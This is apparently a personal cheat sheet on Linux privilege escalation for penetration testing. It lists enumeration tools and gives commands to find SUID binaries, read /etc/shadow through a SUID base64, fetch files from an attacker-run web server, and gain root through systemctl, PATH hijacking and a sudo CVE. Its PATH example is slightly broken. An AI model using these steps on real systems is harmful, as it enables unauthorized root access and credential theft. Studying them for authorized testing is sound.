Privileges Escalations

Useful websites

https://gtfobins.github.io/

https://github.com/carlospolop/PEASS-ng

Enumeration

https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh

https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS

https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh

https://www.kali.org/tools/enum4linux/

https://github.com/linted/linuxprivchecker

If you use LinPeas, you can execute the script and it read it like that:

./LinPeas.sh | tee res
less -r res

You can use this website which listening all CVE: https://www.linuxkernelcves.com/cves

We can try to find any SUID (Set User ID) files:

find / -type f -perm -04000 -ls 2>/dev/null
1856     84 -rwsr-xr-x   1 root     root               85064 May 28  2020 /usr/bin/chfn
2300     32 -rwsr-xr-x   1 root     root               31032 Aug 16  2019 /usr/bin/pkexec
1816    164 -rwsr-xr-x   1 root     root              166056 Jul 15  2020 /usr/bin/sudo
1634     40 -rwsr-xr-x   1 root     root               39144 Jul 21  2020 /usr/bin/umount
1860     68 -rwsr-xr-x   1 root     root               68208 May 28  2020 /usr/bin/passwd
1859     88 -rwsr-xr-x   1 root     root               88464 May 28  2020 /usr/bin/gpasswd
1507     44 -rwsr-xr-x   1 root     root               44784 May 28  2020 /usr/bin/newgrp
1857     52 -rwsr-xr-x   1 root     root               53040 May 28  2020 /usr/bin/chsh
1722     44 -rwsr-xr-x   1 root     root               43352 Sep  5  2019 /usr/bin/base64
1674     68 -rwsr-xr-x   1 root     root               67816 Jul 21  2020 /usr/bin/su
2028     40 -rwsr-xr-x   1 root     root               39144 Mar  7  2020 /usr/bin/fusermount
2166     56 -rwsr-sr-x   1 daemon   daemon             55560 Nov 12  2018 /usr/bin/at
1633     56 -rwsr-xr-x   1 root     root               55528 Jul 21  2020 /usr/bin/mount

In the example above, you can see, we have the ‘s’ in the permission, that’s means, we can execute it with the permission of the user owner. Here, the current user can execute the base64 command with root permission, that’s means, we can execute it. For instance:

LFILE=/etc/shadow
base64 "$LFILE" | base64 --decode

The command below can identify all writable file:

find / -writable 2>/dev/null | cut -d "/" -f 2 | sort -u

Exploit PATH

$ cat main.c
#include <unistd.h>

int main(void){
    setuid(0);
    setgid(0);
    system("hacked");
    return 0;
}
$ gcc main.c -o hacked.c
$ echo '/bin/bash/' > /tmp/hacked
$ chmod 777 /tmp/hacked

Kernel exploit

https://github.com/jondonas/linux-exploit-suggester-2/blob/master/linux-exploit-suggester-2.pl

Useful commands

# On the attacker machine
python3 -m http.server 8080
# On the target machine, we download the file
curl http://ip:8080/myFileToGet

Find SUID/GID

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

Systemctl suid

If the systemctl has the SUID bit set:

ls -la /bin/systemctl
-rwsr-xr-x 1 root root 1115760 sept. 19 18:57 /bin/systemctl

We can create a new service:

TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF

https://hackingeek.com/ce-quil-faut-comprendre-en-linux-permissions-suid-sgid-sticky-bit/

Sudo

If the user has this result:

$ sudo -l
User james may run the following commands on ubuntu:
    (ALL, !root) /bin/bash

And the sudo version lower than 1.8.28:

$ sudo --version
Sudo version 1.8.21p2
Sudoers policy plugin version 1.8.21p2
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.21p2

You can exploit the CVE-2019-14287: https://www.exploit-db.com/exploits/47502

Keys	Action
`?`	Open this help
`n`	Next page
`p`	Previous page
`s`	Search